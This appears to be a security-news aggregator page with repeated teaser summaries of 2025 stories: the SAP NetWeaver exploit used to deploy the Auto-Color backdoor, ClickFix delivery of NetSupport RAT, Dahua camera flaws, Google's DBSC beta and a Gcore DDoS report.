The Breach News

Hackers Target SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware

July 30, 2025
Vulnerability / Threat Intelligence

Threat actors have been found exploiting a critical SAP NetWeaver vulnerability, now patched, to introduce the Auto-Color backdoor in an April 2025 attack on a U.S.-based chemicals firm. According to a report from Darktrace shared with The Hacker News, the attacker accessed the company’s network over three days, attempted to download suspicious files, and communicated with infrastructure associated with the Auto-Color malware. The vulnerability, identified as CVE-2025-31324, is a severe unauthenticated file upload flaw in SAP NetWeaver that allows remote code execution (RCE) and was fixed by SAP in April. Auto-Color, first reported by Palo Alto Networks Unit 42 in February, operates similarly to a remote access trojan, providing remote access to compromised Linux systems. It has been linked to attacks against universities and government entities in North America and Asia between November and December 2024.

Hackers Exploit SAP Vulnerability to Target U.S. Chemical Company with Auto-Color Malware On July 30, 2025, cybersecurity experts reported a significant breach involving a critical vulnerability in SAP NetWeaver, previously patched by SAP. In an incident that unfolded over three days in April 2025, threat actors targeted a U.S.-based chemicals…

Read More

Hackers Target SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware

July 30, 2025
Vulnerability / Threat Intelligence

Threat actors have been found exploiting a critical SAP NetWeaver vulnerability, now patched, to introduce the Auto-Color backdoor in an April 2025 attack on a U.S.-based chemicals firm. According to a report from Darktrace shared with The Hacker News, the attacker accessed the company’s network over three days, attempted to download suspicious files, and communicated with infrastructure associated with the Auto-Color malware. The vulnerability, identified as CVE-2025-31324, is a severe unauthenticated file upload flaw in SAP NetWeaver that allows remote code execution (RCE) and was fixed by SAP in April. Auto-Color, first reported by Palo Alto Networks Unit 42 in February, operates similarly to a remote access trojan, providing remote access to compromised Linux systems. It has been linked to attacks against universities and government entities in North America and Asia between November and December 2024.

Cybercriminals Leverage ClickFix Technique to Distribute NetSupport RAT in Recent Attacks

February 11, 2025
Malware / Cyber Attack

In a disturbing trend since early January 2025, cybercriminals have been utilizing the ClickFix method to distribute a remote access trojan known as NetSupport RAT. This malware, often spread through deceptive websites and fraudulent browser updates, provides attackers with full control of the victim’s device. This access allows them to monitor the screen in real time, manipulate the keyboard and mouse, upload and download files, and execute harmful commands.

Originally developed as a legitimate tool for IT support under the name NetSupport Manager, the software has been weaponized by malicious actors to target organizations and harvest sensitive information, including screenshots, audio, video, and files. According to eSentire, “ClickFix involves injecting a fake CAPTCHA webpage onto compromised sites, tricking users into executing malicious PowerShell commands that download and activate malware payloads.”

Cyber Actors Leverage ClickFix Technique to Distribute NetSupport RAT in Recent Cyber Incidents February 11, 2025 In a troubling development in the cybersecurity landscape, threat actors have been utilizing a technique known as ClickFix to effectively deliver the NetSupport Remote Access Trojan (RAT) since early January 2025. This malware is…

Read More

Cybercriminals Leverage ClickFix Technique to Distribute NetSupport RAT in Recent Attacks

February 11, 2025
Malware / Cyber Attack

In a disturbing trend since early January 2025, cybercriminals have been utilizing the ClickFix method to distribute a remote access trojan known as NetSupport RAT. This malware, often spread through deceptive websites and fraudulent browser updates, provides attackers with full control of the victim’s device. This access allows them to monitor the screen in real time, manipulate the keyboard and mouse, upload and download files, and execute harmful commands.

Originally developed as a legitimate tool for IT support under the name NetSupport Manager, the software has been weaponized by malicious actors to target organizations and harvest sensitive information, including screenshots, audio, video, and files. According to eSentire, “ClickFix involves injecting a fake CAPTCHA webpage onto compromised sites, tricking users into executing malicious PowerShell commands that download and activate malware payloads.”

ToolShell Exploit Confuses the Lines Between Crime and Espionage

Black Hat, Cyberwarfare / Nation-State Attacks, Events Also: Rethinking IT-OT Integration; Previewing Black Hat 2025 Anna Delaney (annamadeline) • August 1, 2025 Clockwise, from top left: Anna Delaney, Mathew Schwartz, Suparna Goswami, and Tom Field This week, four editors from ISMG convened to delve into the latest developments surrounding the…

Read MoreToolShell Exploit Confuses the Lines Between Crime and Espionage

Exclusive: Major Privacy Breach Reveals 1.1 Million Private Messages from Tea App

A digital platform intended to provide anonymity and safeguard personal experiences has instead compromised the privacy of its users. The app, Tea, designed as a secure space for women to discuss their experiences in potentially harmful relationships, has experienced two significant data breaches within a short span, resulting in the…

Read MoreExclusive: Major Privacy Breach Reveals 1.1 Million Private Messages from Tea App

Google Unveils Open Beta for Device Bound Session Credentials in Chrome, Enhancing Patch Transparency with Project Zero

July 30, 2025
Device Security / AI Security

Google has launched an open beta for its Device Bound Session Credentials (DBSC), a security feature aimed at protecting users from session cookie theft attacks. Initially introduced as a prototype in April 2024, DBSC binds authentication sessions to specific devices, preventing malicious actors from using stolen cookies to access accounts from unauthorized devices. “Available in the Chrome browser on Windows, DBSC enhances security after login by linking session cookies—small files that remember user information—to the device used for authentication,” said Andy Wen, senior director of product management at Google Workspace. This initiative not only secures user accounts post-authentication but also complicates the reuse of session cookies, bolstering session integrity. The company has also…

Google Unveils Open Beta for Device Bound Session Credentials (DBSC) in Chrome, Enhancing Security Measures On July 30, 2025, Google announced the open beta launch of its security feature, Device Bound Session Credentials (DBSC), aimed at bolstering protection against session cookie theft attacks. Originally prototyped in April 2024, DBSC is…

Read More

Google Unveils Open Beta for Device Bound Session Credentials in Chrome, Enhancing Patch Transparency with Project Zero

July 30, 2025
Device Security / AI Security

Google has launched an open beta for its Device Bound Session Credentials (DBSC), a security feature aimed at protecting users from session cookie theft attacks. Initially introduced as a prototype in April 2024, DBSC binds authentication sessions to specific devices, preventing malicious actors from using stolen cookies to access accounts from unauthorized devices. “Available in the Chrome browser on Windows, DBSC enhances security after login by linking session cookies—small files that remember user information—to the device used for authentication,” said Andy Wen, senior director of product management at Google Workspace. This initiative not only secures user accounts post-authentication but also complicates the reuse of session cookies, bolstering session integrity. The company has also…

AI Continues to Produce Vulnerable Code

Artificial Intelligence & Machine Learning, Next-Generation Technologies & Secure Development Veracode Study Finds Nearly Half of AI-Generated Code is Insecure Rashmi Ramesh (@rashmiramesh_) • August 1, 2025 Image: Shutterstock/ISMG Recent findings from Veracode have raised serious concerns regarding artificial intelligence’s role in software development. Researchers discovered that large language models…

Read MoreAI Continues to Produce Vulnerable Code

Serious Security Vulnerabilities in Dahua Cameras Enable Remote Takeover via ONVIF and File Upload Exploits

July 30, 2025
Firmware Security / Vulnerability

Cybersecurity researchers have revealed critical security vulnerabilities within the firmware of Dahua smart cameras, which have since been patched. If left unaddressed, these flaws could allow attackers to take control of affected devices. According to a report from Bitdefender shared with The Hacker News, the vulnerabilities—related to the device’s ONVIF protocol and file upload handlers—enable unauthorized attackers to execute arbitrary commands remotely, effectively seizing control of the device.

Tracked as CVE-2025-31700 and CVE-2025-31701 (CVSS scores: 8.1), the vulnerabilities impact the following device series running firmware versions with build timestamps prior to April 16, 2025:

  • IPC-1XXX Series
  • IPC-2XXX Series
  • IPC-WX Series
  • IPC-ECXX Series
  • SD3A Series
  • SD2A Series
  • SD3D Series
  • SDT2A Series
  • SD2C Series

Users can check their device’s build time by logging into the web interface and navigating to Settings → System Information → Version. Both vulnerabilities are classified as…

Critical Security Vulnerabilities in Dahua Cameras Allow Potential Remote Takeover In a recent disclosure, cybersecurity experts have revealed serious security vulnerabilities within the firmware of Dahua smart cameras, now patched but capable of enabling remote control hijacking of affected devices if not mitigated. These flaws, specifically tied to the ONVIF…

Read More

Serious Security Vulnerabilities in Dahua Cameras Enable Remote Takeover via ONVIF and File Upload Exploits

July 30, 2025
Firmware Security / Vulnerability

Cybersecurity researchers have revealed critical security vulnerabilities within the firmware of Dahua smart cameras, which have since been patched. If left unaddressed, these flaws could allow attackers to take control of affected devices. According to a report from Bitdefender shared with The Hacker News, the vulnerabilities—related to the device’s ONVIF protocol and file upload handlers—enable unauthorized attackers to execute arbitrary commands remotely, effectively seizing control of the device.

Tracked as CVE-2025-31700 and CVE-2025-31701 (CVSS scores: 8.1), the vulnerabilities impact the following device series running firmware versions with build timestamps prior to April 16, 2025:

  • IPC-1XXX Series
  • IPC-2XXX Series
  • IPC-WX Series
  • IPC-ECXX Series
  • SD3A Series
  • SD2A Series
  • SD3D Series
  • SDT2A Series
  • SD2C Series

Users can check their device’s build time by logging into the web interface and navigating to Settings → System Information → Version. Both vulnerabilities are classified as…

Gcore DDoS Radar Report Highlights 56% Yearly Surge in DDoS Attacks

February 11, 2025
IoT Security / Cloud Security

The latest Gcore DDoS Radar report, which examines attack data from Q3 to Q4 2024, shows a staggering 56% year-over-year increase in DDoS attacks, with the largest recorded attack reaching 2 Tbps. The financial services sector experienced the most significant rise, with attacks jumping by 117%, while the gaming industry continued to be the primary target. These findings underscore the urgent need for robust and adaptive DDoS mitigation strategies as attacks grow both in frequency and precision.

Key Insights on the Future of DDoS Defense

Here are four crucial takeaways from the Gcore Radar report:

  1. Volume and Sophistication of DDoS Attacks on the Rise: A 17% increase in total attacks, coupled with a new peak volume of 2 Tbps, highlights the pressing necessity for advanced protective measures.

  2. Growing Risks for Financial Services: The 117% spike in attacks within this sector signals an urgent need for enhanced security protocols.

  3. Shift Towards Shorter, High-Intensity Attacks: The prevalence of rapid burst attacks necessitates a reevaluation of traditional mitigation strategies, which may no longer be sufficient.

Let’s explore the data in detail.

Gcore DDoS Radar Highlights Substantial Surge in DDoS Attacks Date: February 11, 2025 Category: IoT Security / Cloud Security Gcore’s recent DDoS Radar report has unveiled significant insights into the landscape of Distributed Denial of Service (DDoS) attacks in the latter half of 2024, revealing a staggering 56% year-over-year increase…

Read More

Gcore DDoS Radar Report Highlights 56% Yearly Surge in DDoS Attacks

February 11, 2025
IoT Security / Cloud Security

The latest Gcore DDoS Radar report, which examines attack data from Q3 to Q4 2024, shows a staggering 56% year-over-year increase in DDoS attacks, with the largest recorded attack reaching 2 Tbps. The financial services sector experienced the most significant rise, with attacks jumping by 117%, while the gaming industry continued to be the primary target. These findings underscore the urgent need for robust and adaptive DDoS mitigation strategies as attacks grow both in frequency and precision.

Key Insights on the Future of DDoS Defense

Here are four crucial takeaways from the Gcore Radar report:

  1. Volume and Sophistication of DDoS Attacks on the Rise: A 17% increase in total attacks, coupled with a new peak volume of 2 Tbps, highlights the pressing necessity for advanced protective measures.

  2. Growing Risks for Financial Services: The 117% spike in attacks within this sector signals an urgent need for enhanced security protocols.

  3. Shift Towards Shorter, High-Intensity Attacks: The prevalence of rapid burst attacks necessitates a reevaluation of traditional mitigation strategies, which may no longer be sufficient.

Let’s explore the data in detail.